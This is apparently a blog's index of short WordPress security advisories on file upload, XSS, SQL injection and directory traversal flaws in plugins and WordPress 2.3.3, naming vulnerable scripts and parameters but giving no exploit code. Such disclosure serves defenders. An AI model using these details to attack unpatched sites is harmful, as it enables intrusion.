Advisories
WP Contact-Form Vulnerabilities
WP Contact Form is a very popular WordPress plugin.
Mustlive has reported a number of vulnerabilities which you can view at his web page here.
According to the plugin authors page, the latest version is 3.1.8. We went ahead and downloaded a copy to have a look. The actual contact form page that your users see is [...]
WP Downloads Manager 0.2 Remote File Upload
The Wp Downloads Manager module is a plugin for WordPress.
Wp Downloads Manager is prone to a vulnerability that lets attackers upload and execute arbitrary code. This issue occurs because the application fails to sufficiently sanitize user-supplied file extensions before uploading files onto the webserver via the ‘upload.php’ script.
Successfully exploiting this issue will allow attackers to [...]
Nextgen gallery – XSS flaw
The Nextgen Gallery Plugin version <= 0.96 have been found vulnerable to a persistent Cross Site Scripting bug..
According to the advisory, the attacker does require authentication and access to the following URL:
http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery
As far as we know, no fix is currently available.
WordPress Upload File Plugin SQL Injection
A SQL Injection vulnerability has been reported in WordPress by the Balsec Team. The advisory is lacking alot of detail.
This post will be updated as new information is made available.
WordPress 2.3.3 Directory Traversal Vulnerability
Sandor Attila Gerendi found a vulnerability within WordPress 2.3.3, which under certain circumstances allows an attacker to run arbitrary PHP code on WordPress 2.3.3.
Input passed via the “cat” parameter to index.php is not properly sanitised in the “get_category_template()” function in wp-includes/theme.php before being used to include files in template-loader.php. This can be exploited to include [...]
